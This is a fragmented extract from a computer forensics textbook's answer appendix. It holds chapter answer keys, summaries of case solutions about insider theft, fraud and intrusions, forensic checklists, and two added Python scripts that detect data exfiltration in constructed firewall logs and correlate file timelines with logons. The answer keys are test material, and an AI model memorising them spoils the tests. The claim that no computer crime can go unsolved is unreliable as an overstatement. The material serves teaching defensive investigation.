A former employee claims he never took any information with him when he left
...
Under court order, the individual turned over a laptop computer, with no obvious data related to the case
...
The suspect
finally settled
...
The
individual was accused of taking proprietary documents on his laptop
...
Additionally, the individual claimed that a
prolific virus had destroyed the documents
...
The individual was then sanctioned
...
Under court
order, the competitor provided a diskette that had gone with the individual to the
new firm
...
Although
it was damaged, deleted, and overwritten, evidence of illegal customer lists and the
lists themselves were discovered on the diskette
...
2
...
4
...
True
False
True
True
True
Multiple Choice
1
...
3
...
5
...
Applying forensic data analysis methods,
the CFS downloaded five years worth of general ledger data from a mainframe computer
system, along with large volumes of data from
client file servers
...
Hands-on Projects
Your computer forensics team would provide
on-site computer forensic evidence preservation, digital evidence recovery, file inventory,
and data analysis
...
The DMSC
would provide advanced document management services for capturing, storing, retrieving,
analyzing, viewing, and sharing discovery information and work product
...
Most
DMSCs are housed in a highly secure 40,000+
square foot facility, and staffed by systems and
network engineers, database designers, software developers, litigation support personnel,
and industry-focused professionals
...
He
then contacts the company’s chief information
security officer (CISO) and informs him of the
situation
...
Fortunately, this is exactly the kind
of incident the company had in mind when it
developed the computer forensic annex to its
information security plan
...
The
incident manager then contacts the company’s
general counsel to discuss the various legal issues involved in the investigation
...
After conducting a routine examination of
the collected material, the forensic technician
notices a substantial amount of proprietary information on the employee’s hard drive that he
does not appear to need
...
Analysis of the server and firewall logs reveals
that lots of information was transferred from the
database server to the competition
...
The researcher identifies code on both the employee
workstation and the database server that’s written to send information from the database
server to the competitor’s computer on command from the employee’s workstation
...
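The log analysis described above comes down to one question: which internal server sent how much to which outside address. The script below is an added example, not the book's or the company's own code; it parses constructed firewall log lines in an assumed format, sums allowed outbound bytes per source/destination pair for a watched server, ignores transfers that stay inside the assumed internal range, and reports pairs over a size threshold with the time window of the flows. The addresses, format and threshold are all assumptions.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed firewall log lines for this demonstration (not real data).
SAMPLE_LOG = """\
2004-03-02T22:14:05 ALLOW TCP 10.0.0.5:52311 -> 203.0.113.7:21 bytes=48213988
2004-03-02T22:31:40 ALLOW TCP 10.0.0.5:52318 -> 203.0.113.7:21 bytes=71200432
2004-03-02T23:02:11 ALLOW TCP 10.0.0.5:52324 -> 203.0.113.7:21 bytes=9930100
2004-03-02T09:15:02 ALLOW TCP 10.0.0.5:49100 -> 10.0.0.20:1433 bytes=812044312
2004-03-02T10:03:44 ALLOW TCP 10.0.1.37:51022 -> 198.51.100.10:443 bytes=184320
2004-03-02T22:13:50 ALLOW TCP 10.0.1.37:51090 -> 203.0.113.7:21 bytes=2048
2004-03-02T22:13:51 DENY TCP 10.0.1.37:51091 -> 203.0.113.7:22 bytes=0
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>ALLOW|DENY) (?P<proto>\S+) "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+) "
    r"bytes=(?P<bytes>\d+)$"
)

INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]   # assumed internal space
SERVERS_OF_INTEREST = {"10.0.0.5"}                     # hypothetical DB server


def parse(lines):
    """Yield one dict per well-formed line; malformed lines are skipped."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            yield m.groupdict()


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def detect_exfil(lines, servers=SERVERS_OF_INTEREST, threshold=50 * 1024 * 1024):
    """Sum allowed outbound bytes per (src, dst) where src is a watched server
    and dst lies outside the internal networks; report pairs over threshold."""
    totals = defaultdict(lambda: {"bytes": 0, "flows": 0, "first": None, "last": None})
    for rec in parse(lines):
        if rec["action"] != "ALLOW" or rec["src"] not in servers:
            continue
        if is_internal(rec["dst"]):
            continue
        agg = totals[(rec["src"], rec["dst"])]
        agg["bytes"] += int(rec["bytes"])
        agg["flows"] += 1
        agg["first"] = min(filter(None, [agg["first"], rec["ts"]]))
        agg["last"] = max(filter(None, [agg["last"], rec["ts"]]))
    findings = []
    for (src, dst), agg in sorted(totals.items()):
        if agg["bytes"] >= threshold:
            findings.append({"src": src, "dst": dst, **agg})
    return findings


if __name__ == "__main__":
    for f in detect_exfil(SAMPLE_LOG.splitlines()):
        print(f"{f['src']} -> {f['dst']}: {f['bytes']} bytes in "
              f"{f['flows']} flows between {f['first']} and {f['last']}")
```

The time window in each finding is what you then line up against the workstation evidence: code found on the workstation that triggers the server-side transfer should have been run at or just before the first flow.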
The incident manager uses the reports from the forensic technician and the researcher to write an incident report for
executive management
...
The general counsel sues the competitor for damages, obtaining a restraining
order against the competition and demonstrating the company’s aggressive protection of its
trade secrets
...
You should deploy CFSs to
the client locations worldwide to preserve electronic evidence
...
Chapter 2: Types of Computer Forensics
Technology
Review Questions and Exercises
True/False
1
...
3
...
5
...
2
...
4
...
C
D
E, A
E
E, B
Exercise
The following is a partial solution to aid the
CFS in coming up with his or her own solution
to solve this case
...
The client ultimately saved
approximately $5
...
Answers to Review Questions, Exercises, and Projects
Hands-on Projects
The following is a partial solution to aid the
CFS in coming up with his or her own solution
to solve this case
...
They also identified programmatic and systemic internal control weaknesses that would have allowed other
employees to engage in similar embezzlement
schemes without detection
...
However,
all of the incidents observed shared certain common traits: large enterprises supported by extremely high bandwidth Internet connections,
largely Windows NT and Windows 2003 enterprises, persistent compromise of administrator
and domain administrator accounts, and widespread use of a distributed two-tier FTP server—
where the FTP root directory structure was
composed of a virtual file system of shared drives
...
com, suffers from this same set of common criteria, and
like most of the real-world incidents, the attackers are serving both warez and porn
...
Should the CFS need to initiate corrective action at this time, there are a number of
things he or she can do to end the current compromise, starting with changing the administrator passwords, and restricting NetBIOS
using packet filters on the switches supporting
the WebFile
...
However, before
the CFS starts with the eradication phase of the
incident response, he or she really needs to
complete the identification phase: the CFS has
yet to identify the initial compromise method
or to identify the scope of the compromise
...
Optional Team Case Project
The network side of the analysis is often much
more time consuming than the “live approach” of a compromised host
...
In the preceding
case project, the CFS had the home-field advantage over the attackers
...
The CFS ought to know the policies networks operate under, and those policies ought
to be complied with
...
Historically, the Windows environment
has been difficult to monitor, analyze, and secure, simply because of the lack of security
tools that run on the platform
...
The reality of the situation is
that this sometimes happens, particularly in
complex environments where there is poor access control and monitoring
...
In a real incident these should absolutely be studied
...
In this optional team case project, several
“cardinal rules” of security were violated
...
The global domain administrator account actually used the same password as
each local administrator account, further reducing the security of the enterprise as a whole
...
Clearly some architectural
changes and a redesign of the network are
called for
...
At the risk of starting a religious discussion, Windows is neither more nor less
inherently secure than any other platform—
with a few arguable exceptions
...
As a result, its flaws are exploited often and
well
...
• Characterize the network
...
Finally, take the time to prepare yourself
...
Most
importantly, take the time to dig into the tools
and practice using them
...
Chapter 3: Types of Computer
Forensics Systems
Review Questions and Exercises
True/False
1
...
3
...
5
...
D
2
...
B
4
...
C, D
Exercise
The following is a partial solution to aid the
CFS in coming up with his or her own solution
to solve this case
...
In addition to the ATM cash
withdrawal, an Internet banking transfer to an
overseas account has also been made
...
Hands-on Projects
At 11:37 A.M., the forensics system issues an
alert to the enterprise computer forensics team,
who investigate the incidents
...
With
no obvious evidence of tampering with the PC,
the computer forensics team call in another
staff member to perform a sweep of both offices for hidden audio recording units
...
Case Project
The following is a partial solution to aid the
CFS in coming up with his or her own solution
to solve this case
...
It is discovered
that the Internet banking transaction is fraudulent
...
Optional Team Case Project
The organization’s computer forensic technology team uncovered digital evidence of a false invoicing scheme perpetrated by the executive and
vendor coconspirators over a six-year period,
resulting in a major embezzlement of corporate
funds
...
The investigation resulted in a referral to the FBI
and the subsequent indictment of the senior
executive
...
2
...
4
...
False
True
False
True
True
Multiple Choice
1
...
3
...
5
...
The CFS also recovered emails
between management officials and outside auditors that called into question an auditor’s independence
...
Hands-on Projects
The following is a partial solution to aid the
CFS in coming up with his or her own solution
to solve this case
...
The CFST was able to recover the
email and the database for the imaging firm
and subsequently testified to the findings of
their forensic analysis
...
Case Project
In the preliminary stages of an employment
dispute case, a CFST was brought in by a large
computer services corporation to perform a
forensic recovery on an employee’s desktop
computer
...
Thus, the employee
was exonerated of any wrongdoing and other
costly proceedings were averted
...
A CFS team was hired to locate any deleted files and verify certain illicit
and non-work related contents of the hard
drives in question
...
Both the
CEO and the network administrator were dismissed as a result of the investigation
...
2
...
4
...
False
False
False
False
False
Multiple Choice
1
...
3
...
5
...
The CFS received three
backup tapes and the hard drive from the system
...
Hands-on Projects
The CFST was able to restructure and reformat
all the files needed for the claimant’s specific
software application and reprogram data
...
When
shown the evidence, the plaintiff dropped the
suit and was promptly countersued
...
Within three days, the CFST
was able to recover 100% of the data from four
of the drives; 99% was recovered from the fifth
drive
...
By using the proprietary password-encryption program and programming knowledge of the email system, the CFST
was able to locate all emails and attachments
meeting selected criteria and electronically
transmitted them to the court within only five
days
...
The defendant was
charged with perjury
...
2
...
4
...
True
False
False
False
False
Multiple Choice
1
...
3
...
5
...
During the research of her
computer, the CFS was able to recover several
deleted email messages exchanged between the
young girl and a suspect
...
Hands-on Projects
The following is a partial solution to aid the
CFS in coming up with his or her own solution
to solve this case
...
Case Project
The following is a partial solution to aid the
CFS in coming up with his or her own solution
to solve this case
...
Optional Team Case Project
The following is a partial solution to aid the CFS
in coming up with his or her own solution to
solve this case
...
The case was settled before trial
...
2
...
4
...
False
False
False
True
False
Multiple Choice
1
...
3
...
5
...
A CFST was engaged to copy
and archive each workstation computer hard
drive for future analysis in case a dispute over
intellectual property arose in the future
...
A CFS working alongside the
network administrator proved that the accused
employee did not download the images, but in
fact the images were “planted” there across the
network by another disgruntled employee
...
The
wrongly accused employee is also suing the employee who planted the images
...
CFS analysis produced evidence of ties to other crimes and suspects including car theft, prostitution, firearms
violation, and identity theft
...
Optional Team Case Project
The following is a partial solution to aid the
CFS in coming up with his or her own solution
to solve this case
...
Once confronted with this information, the bookkeeper admitted to the crime and
was forced to make restitution
...
2
...
4
...
False
False
True
False
False
Multiple Choice
1
...
3
...
5
...
This enabled the CFST
to better focus their tape conversion efforts
...
The CFST was thus
able to help the company meet its seemingly
impossible deadline
...
Hands-on Projects
Initially, the CFST was requested to perform
forensics examinations upon scores of the publicly owned company’s computers from locations around the world—a service that would
easily add up to over $200,000 in initial consulting services
...
The accounting firm and client
agreed
...
The matter is ongoing
...
The CFST obtained a listing of
all deleted and undeleted files from the mirror
image backup and performed a search for key
words associated with the sensitive files suspected of being downloaded
...
A file listing time-line analysis was
performed, and it showed that numerous files
were loaded on the computer while the employee was on leave of absence and the laptop
computer was in his possession
...
This showed
that the employee had been logged onto the
network during the times that the questioned
files first appeared on the laptop
...
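The timeline analysis described above is two lookups: which files first appeared on the laptop during the leave of absence, and whether the employee held a network logon at each of those moments. The script below is an added example, not the CFST's tool: the file listing (path and creation time, as a forensic tool would export it), the logon records and the leave window are all constructed, and the timestamps are assumed to have been normalized to one time zone already.

```python
from datetime import datetime

FMT = "%Y-%m-%d %H:%M"

# Constructed file listing (path, created) from the laptop image and
# constructed network logon records (user, logon, logoff). Not real data.
FILE_LISTING = [
    ("C:\\Users\\jdoe\\Docs\\budget.xls",       "2004-04-28 14:10"),
    ("C:\\Users\\jdoe\\Docs\\client_list.xls",  "2004-05-06 21:42"),
    ("C:\\Users\\jdoe\\Docs\\pricing_2004.doc", "2004-05-06 21:47"),
    ("C:\\Users\\jdoe\\Docs\\roadmap.ppt",      "2004-05-12 23:05"),
    ("C:\\Users\\jdoe\\Docs\\resume.doc",       "2004-05-20 09:30"),
]
LOGON_RECORDS = [
    ("jdoe", "2004-05-06 21:30", "2004-05-06 22:15"),
    ("jdoe", "2004-05-20 09:00", "2004-05-20 17:02"),
]
LEAVE_START, LEAVE_END = "2004-05-03 00:00", "2004-05-17 23:59"


def parse_ts(s):
    return datetime.strptime(s, FMT)


def files_created_between(listing, start, end):
    """Files whose creation time falls inside [start, end]."""
    s, e = parse_ts(start), parse_ts(end)
    return [(p, c) for p, c in listing if s <= parse_ts(c) <= e]


def logged_on_at(records, user, ts):
    """True if `user` had a session open (logon <= ts <= logoff) at ts."""
    t = parse_ts(ts)
    return any(u == user and parse_ts(on) <= t <= parse_ts(off)
               for u, on, off in records)


def correlate(listing, records, user, start, end):
    """Timeline of files that first appeared during the window, each
    annotated with whether the user was logged on to the network then."""
    flagged = sorted(files_created_between(listing, start, end), key=lambda x: x[1])
    return [{"path": p, "created": c, "logged_on": logged_on_at(records, user, c)}
            for p, c in flagged]


if __name__ == "__main__":
    for row in correlate(FILE_LISTING, LOGON_RECORDS, "jdoe", LEAVE_START, LEAVE_END):
        print(f"{row['created']}  logged_on={row['logged_on']!s:5}  {row['path']}")
```

Creation timestamps on a file system can be altered, so the logon records are not decoration: a file that appears while the account has an open session is corroborated by a source the laptop's owner did not control, which is the point the original analysis made.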
Optional Team Case Project
The following is a partial solution to aid the
CFS in coming up with his or her own solution
to solve this case
...
” A situation that might have
been mired in a “he said/she said” continuum
was quickly resolved; the woman got her job
back (including all lost wages and benefits),
and the real culprit was terminated
...
2
...
4
...
True
False
False
False
False
Multiple Choice
1
...
3
...
5
...
Through inquiries of hospital staff, the
CFST learned that the system was prone to
problems and periodically “crashed
...
Subsequently, the hospital
replaced this system with a new system because
of the periodic crashes that occurred
...
The plaintiff ’s attorneys countered that the
manufacturer examined the system the day
after the patient’s death and could not find any
problems
...
He further
explained that the system functioning normally on the day the manufacturer
examined it did not mean that it was
functioning on the day of the second angiogram procedure
...
The jury ruled that no monetary damages would have to be paid to the plaintiffs
...
all of the feedback from
the jurors has been extremely positive toward
you and your testimony
...
A specific search of the deleted files in
this directory identified the executive’s “to do
list” file
...
Another “to do” item specified that the executive
was to “learn how to destroy evidence on a
computer
...
It
was also shown that numerous key company
files were located on removable computer storage media that had not been turned over by the
executive to the company
...
Case Project
The entire acquisition occurred without the knowledge of anyone in Asia and without disrupting operations
...
The computer forensic tool essentially enabled an investigation that otherwise would likely not have taken place
...
An on-site response process may have compromised the investigation in this case or, at a minimum, impacted business and morale because of the very non-clandestine physical presence of investigators
...
A large government agency used a CFST’s computer forensic tool and a high-speed network connection to image a drive on its wide area network (WAN) located approximately 10,000 miles (16,000 km) away
...
Without the CFST’s computer forensic tool, the response would have been delayed by several days or may not have occurred
...
2
...
4
...
True
True
True
True
True
Computer Forensics, Second Edition
Multiple Choice
1
...
3
...
5
...
The CFST successfully used a computer forensics tool to preview the server and collect key evidence, without disrupting operations
...
Hands-on Projects
The CFST used a computer forensics tool and network logs to examine the files on 60 network machines
...
It was discovered that unauthorized Web servers containing more than 20 gigabytes of pornographic material had been set up across the network
...
An unexpected result of the investigation revealed additional rogue servers placed above ceiling tiles, communicating with the network via multiple wireless access points
...
The whole team was immediately terminated
...
The result was significant time saving and reduced investigative fees
...
The porn operation was shut down and the corporate bandwidth returned to normal, and the company prevented a huge possible liability
...
It was soon discovered that management ordered staff to destroy key documents
...
In addition, on some systems, the CFST was able to recover incriminating documents that had been deleted
...
Eventually, enough information was recovered to reconstruct the actual events and prove that numerous high-level managers had schemed to alter the records of the company
...
Optional Team Case Project
The following is a partial solution to aid the CFS in coming up with his or her own solution to solve this case
...
), the CFST was able to identify the hacker, which would enable law enforcement to obtain a search warrant if the client elected to press charges
...
2
...
4
...
True
False
True
False
True
Multiple Choice
1
...
3
...
5
...
Using forensic analysis, the CFST determined that the documents had been created and printed out, but never saved on the desktop computer at one of the workstations utilized by one of the four suspects
...
The CFST’s analysis revealed that the paralegal had in fact created the document weeks prior to the deadline, and the file had not been accessed or altered
...
Case Project
The following is a partial solution to aid the CFS in coming up with his or her own solution to solve this case
...
Optional Team Case Project
The CFST forensically preserved all of the evidence of the attacks and the harassing email
...
After tracing the origin of one of the harassing emails to the fired developer’s new place of employment, the CFST enlisted the cooperation of the new employer, which resulted in the forensic imaging of the developer’s new laptop
...
The CFST presented this information and results of its internal investigation to the U.S. Secret Service and the U.S. Attorney’s Office in Manhattan, which accepted prosecution
...
Chapter 12: Networks
Review Questions and Exercises
True/False
1
...
3
...
5
...
2
...
4
...
D, E
C
A
A
B
Exercise
In the course of the engagement, the CFST imaged seven desktop and server hard drives and performed forensic analysis
...
Using the results of the forensic analysis (including significant data recovered from deleted file space) and the information generated from the test environments, the CFST was able to reach expert conclusions regarding the authenticity of the different versions of this critical email
...
The CFST introduced the client to trusted former colleagues at the FBI and acted as liaison
...
The CFST worked closely with the law enforcement authorities in that foreign country
...
The CFST arranged for its client to travel to that Western country, where—after a face-to-face meeting in an undercover law enforcement location—the hackers were arrested on extortion charges
...
Case Project
Within hours, the CFST had NT systems experts working closely with the company’s IT personnel
...
The CFST also found serious weaknesses in the company’s logging system
...
As a result, the company needed to decide whether to incur the cost of a server-by-server search for potentially corrupted files
...
For the company, a complex decision remained—whether to proceed criminally or civilly against the ex-employee
...
Crucial to the company’s decision was the fact that the CFST had uncovered and preserved significant forensic evidence linking the ex-employee with the computer break-in
...
Optional Team Case Project
Working closely with the firm’s systems administrators, the CFST quickly captured the IP address used in one of the attacks
...
Within hours, the Secret Service had linked the captured IP address to a computer in the library of the employee’s college, located a witness at the library, and identified files belonging to the employee on the relevant computer’s hard drive
...
He subsequently pleaded guilty to launching the attacks in violation of the Computer Fraud and Abuse Act
...
The CFST assessed the dollar value of the loss suffered by the firm, knowing that the assessment would prove critical in the calculation of the employee’s sentence, in this case an eight-month prison term
...
2
...
4
...
False
True
True
True
True
Multiple Choice
1
...
3
...
5
...
Working with the accounting firm and the company, the CFS convinced both parties to significantly narrow the universe of computers to be searched; the conjecture was that given the parameters of the matter, any trail of malfeasance would likely lead to the executive ranks
...
Initial processing revealed several key leads for a fraction of the initial projected expense
...
The CFST obtained a listing of all deleted and undeleted files from the mirror image backup and performed a search for key words associated with the sensitive files suspected of being downloaded
...
A file listing timeline analysis was performed, and it showed that numerous files were loaded on the computer while the employee was on leave of absence and the laptop computer was in his possession
...
This showed that the employee had been logged onto the network during the times that the questioned files first appeared on the laptop
...
Case Project
The hard drives from the executive’s notebook and desktop machines were forensically imaged
...
Additionally, reconstruction of deleted files located emails between the executive and the competitor discussing his intent to provide the proprietary information if he was offered additional options in the new company
...
After making a forensic image backup of the ex-boss’ hard drive, the CFST was able to recover deleted electronic messages that showed that the ex-boss had a history of propositioning women under his supervision for “special favors
...
Chapter 14: The Information Warfare Arsenal and Tactics of the Military
Review Questions and Exercises
True/False
1
...
3
...
5
...
2
...
4
...
B
E
A
B
C
Exercise
After making a forensic image backup of the hard drives, the CFST identified a file directory that had been deleted during the aforementioned five-day period that had the same name as the competitive company the executive had established
...
This file indicated that the executive planned to copy the company’s database (valued at $400 million) for his personal use
...
” The CFST’s examination also proved that the executive had been communicating with other competing companies to establish alliances, in violation of the executive’s nondisclosure agreement with the company
...
The company was able to settle with the executive for all that it had originally requested in its lawsuit
...
The evidence started to point toward the organization’s system administrator, but he denied it
...
Over three months, he had visited 4,500 pornographic Web sites and downloaded over 48,000 images
...
The expertise in computer forensics and incident response saved an innocent person’s job and good name and uncovered the real culprit
...
Case Project
A CFST was asked to examine the departing manager’s personal laptop computer to determine if the individual in question had been negotiating in bad faith
...
• The individual had negotiated the contract with the full intention of resigning immediately on signing
...
• The individual had been a director of the competing company even prior to the original buy-out
...
• The individual had been involved in the defection of key staff from the CFST’s client to the new company
...
• The individual had used company resources to research and solicit the services of escorts
...
Court action was initiated to prevent the transfer of $40 million to the individual responsible
...
Optional Team Case Project
A CFST was able to confirm the extensive damage to the casing and motherboard of the computer, but the hard disk was undamaged and the forensic company recovered all the data from it, thus saving the insurance company from a fraudulent claim
...
2
...
4
...
False
True
True
False
False
Multiple Choice
1
...
3
...
5
...
), a CFS was able to identify the hacker, which would enable law enforcement to obtain a search warrant if the client elected to press charges
...
Case Project
Using advanced data forensic recovery, the CFS was able to recover 9 million emails within five days
...
5 million emails on the November and December 2004 tapes
...
This strengthens the claim that off-the-shelf recovery and e-evidence discovery tools are not the most advanced way to recover data
...
The courts are beginning to recognize this and that better, more advanced technology exists
...
Optional Team Case Project
The CFS was able to recover the email and the database for the format imaging firm and subsequently testified to the findings of their forensic analysis
...
After a four-week trial, a San Antonio, Texas, jury rendered a $2
...
The jury of seven women and five men heard the evidence in two phases
...
In the second phase, the jury found that the defendants acted with malice
...
However, with the forensic technology that’s available today, no computer crime can go unsolved
...
2
...
4
...
True
False
True
False
True
Multiple Choice
1
...
3
...
5
...
Thus, the employee was exonerated of any wrongdoing, and other costly proceedings were averted
...
Both the CEO and the network administrator were dismissed as a result of the investigation
...
By using electronic data discovery and forensic and analysis applications, the CFS discovered that the software installation had not caused the data loss and determined that the plaintiff had manually erased the alleged lost data
...
Optional Team Case Project
Within four days, the CFS was able to recover 100% of the data from four of the drives; 99% was recovered from the fifth drive
...
2
...
4
...
False
False
False
True
True
Multiple Choice
1
...
3
...
5
...
The case was settled in the plaintiff’s favor on the eighth day
...
Hands-on Projects
The entire acquisition occurred without the knowledge of anyone in Asia and without disrupting operations
...
The CFST essentially enabled an investigation that otherwise would likely not have taken place
...
An on-site response process may have compromised the investigation in this case or, at a minimum, impacted business and morale because of the very non-clandestine physical presence of investigators
...
Without the CFS, the response would have been delayed by several days or may not have occurred
...
Without the CFS, law enforcement investigators would have either walked away from the scene empty-handed or performed a highly invasive and incomplete investigation by making logical file copies of active data
...
2
...
4
...
True
True
True
True
True
Multiple Choice
1
...
3
...
5
...
The CFST determined that large amounts of pornography were traveling through the network
...
The CFST was able to determine which users had access privileges and had logged onto the suspected machines
...
In a weekend, enough evidence was gathered to determine that the entire network administration team had been part of a sophisticated porn operation
...
The CFST performed the entire investigation in only 3 days; 11 days fewer than expected
...
In addition, the company had sufficient evidence to protect itself from a wrongful termination suit
...
Hands-on Projects
The CFS performed an exhaustive search of all computer records within the company’s large finance division
...
However, certain staff members did not fully comply with the order, making the files easily recoverable
...
The entire process occurred without affecting business operations or productivity
...
The suspected staff members were terminated and criminal charges were brought against them
...
Handling the audit, the CFST was also able to identify crucial evidence that resulted in the safeguarding of 7
...
The data retrieved by the CFST exposed a central duty evasion scheme that had robbed the Indian government of 2
...
In exposing false claims and fabricated documents, the CFST was able to provide analysis and information in the case that supported the seizure of cash, equivalent to $435,000
...
The examination uncovered five years’ worth of unaccounted transactions
...
The incident exposed an evasion of excise duties totaling nearly 5
...
Qualitatively and quantitatively, the outputs provided by the CFST were an invaluable contribution to the interests of government revenue
...
They were able to secure the scene, and the CFS called the system administrator and requested administrative access to the server
...
If the company didn’t agree to the CFS having system access, APD would have had the authority to seize the hardware, and any loss of productivity or data would have been their own responsibility
...
The CFS ended up downloading two 33
...
The CFS had brought with him enough target media for 720 gigabytes worth of data
...
The CFS seized the workstations and conducted the acquisition of these computers back at the APD, where he had the ability to do four acquisitions at a time
...
In two and a half days, the CFS had that business back up and running
...
If it wasn’t for the CFS’s speed and efficiency and availability to acquire data through a network, the city of Austin would be looking at a huge liability
...
Basically, APD conducted the data seizure in a manner that was in the best interest of the city and this company
...
The CFS told him that the computers had already been returned and had been up and running in their business since noon
...
2
...
4
...
False
False
False
False
False
Multiple Choice
1
...
3
...
5
...
The CFST determined that large amounts of pornography were traveling through the network
...
The CFST was able to determine which users had access privileges and had logged onto the suspected machines
...
In a weekend, enough evidence was gathered to determine that the entire network administration team had been part of a sophisticated porn operation
...
The CFST performed the entire investigation in only 3 days; 11 days fewer than expected
...
In addition, the company had sufficient evidence to protect itself from a wrongful termination suit
...
Hands-on Projects
The firm had an instance of an inappropriate email circulating through their network and violating their corporate policy
...
First, the firm was able to identify the source of the email, which was sent externally
...
The reports that the firm was able to generate from the corporate relationship standpoint were excellent
...
When the evidence was sent to them, the quality and completeness were such that they rarely asked for more information
...
Case Project
The challenge in doing further analysis was that the manager in question was located in California, while the investigators were in New Jersey
...
Upon further analysis, it was determined that the dialog in question was in an email from the manager’s spouse, accusing him of vile and unlawful behavior
...
The investigation was completed in 30 minutes, without the CFS having to travel cross-country, without harming the employee’s reputation, and without having to alert anyone outside of corporate security about the potential situation
...
Optional Team Case Project
Within six hours of the CFS’s initial involvement with this case, the CFS was able to identify information necessary to support the client’s claims
...
The investigation revealed that the files used by the opposition in their manufacturing process possessed the identical metadata of the files originally created by the client
...
The similarities in document format, font selection, file creation dates, and document metadata would prove to be the compelling evidence the client needed to present their case
...
False
2
...
False
4
...
False
Multiple Choice
1
...
3
...
5
...
The CFST then further investigates and analyzes employee actions including inappropriate material, email abuse, instant messaging, and other nonbusiness-related activity
...
This information assists in proving or disproving the allegations against employees
...
Hands-on Projects
This organization was able to investigate machines that may have been compromised by a malicious entity
...
IDS alerts notified the CFST about the suspect machines
...
This information assisted them in identifying the exact application tunneling through the corporate firewalls and making calls to the Internet
...
During incident post-analysis, the CFST reviewed findings and implemented new controls to prevent similar incidents from occurring in the future
...
In the event of a wrongful termination lawsuit or when defending against employee accusations, the company has a forensic copy of the hard drive
...
Optional Team Case Project
The company uses a CFS to examine employee hard drives and check for claim IDs related to cases that have been determined or suspected as fraudulent
...
The CFS can also conduct further analysis to locate relevant manipulated and deleted documents on employee computers that can be used to prove or disprove culpability
...
The entire investigation is performed covertly without creating employee ill-will and without the need for in-person investigations
...
False
2
...
False
4
...
True
Multiple Choice
1
...
3
...
5
...
Flying a CFST overseas is impractical because it could require several weeks to coordinate and clear special computer equipment through customs
...
Fortunately, the CFST was able to remotely investigate any computer system in a forensically sound and noninvasive manner anywhere on a wide area network—without disrupting system operations
...
Suspect employees would often be alerted to an investigation because of the inability to conduct rapid and discreet investigations
...
The use of a CFST introduced a new level of efficiency and efficacy to organization-wide investigative processes, saving the company time and money while dramatically reducing legal and financial exposure
...
Upon analysis, they found important evidence pointing toward certain fraudulent actions tied to key individuals
...
Coincidentally, this successful analysis took place just before the financial audit team was traveling to the Middle East office to conduct what once was a previously scheduled, routine audit
...
Interview information was then passed on to the U.S. CFST, who used the answers to continue searching for additional evidence
...
Those individuals were swiftly terminated
...
It allowed investigative teams to identify that fraud had occurred, pinpoint potential suspects and narrow the investigative scope to specific topics and individuals
...
Appendix F: Checklists by Chapter
PART I: OVERVIEW OF COMPUTER FORENSICS TECHNOLOGY
Chapter 1: Computer Forensics Fundamentals
Table F1
...
____ 2
...
____ 4
...
Protect the subject computer system during the forensic examination from any possible alteration, damage, data corruption, or virus introduction
...
This includes existing normal files, deleted yet remaining files, hidden files, password-protected files, and encrypted files
...
Reveal (to the greatest extent possible) the contents of hidden files as well as temporary or swap files used by both the application programs and the operating system
...
____ 6
...
____ 8
...
Analyze all possibly relevant data found in special (and typically inaccessible) areas of a disk
...
Print out an overall analysis of the subject computer system, as well as a listing of all possibly relevant files and discovered file data
...
Provide expert consultation and/or testimony, as required [1]
...
Table F1.2 Principal Computer Forensic Activities Checklist Form
Principal Computer Forensic Activities Checklist Form
Date: _______________________
The computer forensic specialist should ensure that the following provisional list of actions for some of the principal computer forensic methods are adhered to (check all tasks completed):
____ 1
...
3
...
5
...
7
...
9
...
Safely seize computer systems and files to avoid contamination and/or interference
...
Safe and noncontaminating copying of disks and other data media
...
Source and review backup and archived files
...
Recover material from swap and cache files
...
Core-dump: Collect an image of the contents of the active memory of a computer at a particular time
...
____ 11
...
____ 13
...
____ 15
...
____ 17
...
____ 19
...
____ 21
...
____ 23
...
____ 25
...
____ 27
...
____ 29
...
____ 31
...
____ 33
...
Review single computers for proper working during relevant period, including service logs, fault records, and the like
...
Review complex computer systems and networks for proper working during relevant period, including service logs, fault records, and the like
...
Review applications programs for proper working during relevant period, including service logs, fault records, and the like
...
Identify and review monitoring logs
...
Review access control services—quality and resilience of facilities (hardware and software, identification/authentication services)
...
Review and assess encryption methods—resilience and implementation
...
Monitor email
...
Use honeypots
...
Review and assess measuring devices and other sources of real evidence, including service logs, fault records, and the like
...
Use purpose-written search programs to examine the contents of a file
...
Examine telecoms devices and location of associated activity logs and other records perhaps held by third parties
...
Reconstruct complex computer intrusion
...
____ 35
...
____ 37
...
____ 39
...
...
Reconstruct disaster affecting computer-driven machinery or process
...
Reverse compilation of suspect code
...
Chapter 2: Types of Computer Forensics Technology
Table F2
...
____ 2
...
____ 4
...
____ 6
...
Move documentary evidence quickly from the printed or typewritten page to computer data stored on floppy diskettes, Zip disks, CDs, and computer hard disk drives
...
Share computer files over the Internet, when tied to the commission of a crime (creates a new and novel twist to the rules of evidence and legal jurisdiction)
...
The evidence needed to prove such computer-related crimes potentially resides on one or more computer hard disk drives in various geographic locations
...
Such evidence is commonly referred to as computer evidence, but it is not limited to cases involving computer crimes
...
Computer crimes are specifically defined by federal and/or state statutes
...
____ 8
...
____ 10
...
____ 12
...
____ 14
...
Make sure ambient data (which is usually beyond the awareness of most computer users) provides the computer forensics investigator with the element of surprise when computer users are interviewed
...
Make sure your computer investigations rely on evidence that is stored as data and that the timeline of dates and times of files that were created, modified, and/or last accessed by the computer user are recorded
...
Make sure your computer forensics investigator always considers timelines of computer usage in all computer-related investigations
...
Computer investigations play an important role in cases involving the theft of company trade secrets
...
The same is true concerning criminal litigation involving stock frauds, financial frauds, and embezzlements
...
In the past, documentary evidence used to prove these crimes was exclusively in paper form
...
Financial fraud investigators have been forced to change the way they do business
...
Make sure your computer investigations involve the analysis of the Windows swap file
...
When such leads are identified, they can be perfected through the use of computer forensics text search programs
...
Chapter 3: Types of Computer Forensics Systems
Table F3
...
2
...
4
...
6
...
8
...
____ 10
...
____ 12
...
____ 14
...
____ 16
...
____ 18
...
20
...
22
...
Have procedures in place to develop your security policy
...
Have procedures in place to deter masqueraders and ensure authenticity
...
Have procedures in place to thwart counterfeiters and forgery to retain integrity
...
Have procedures in place to configure your operating system and network security
...
Have procedures in place to issue and manage certificates
...
Have procedures in place to identify hacking techniques
...
Have procedures in place to deploy an IDS
...
Have procedures in place to manage your IDS
...
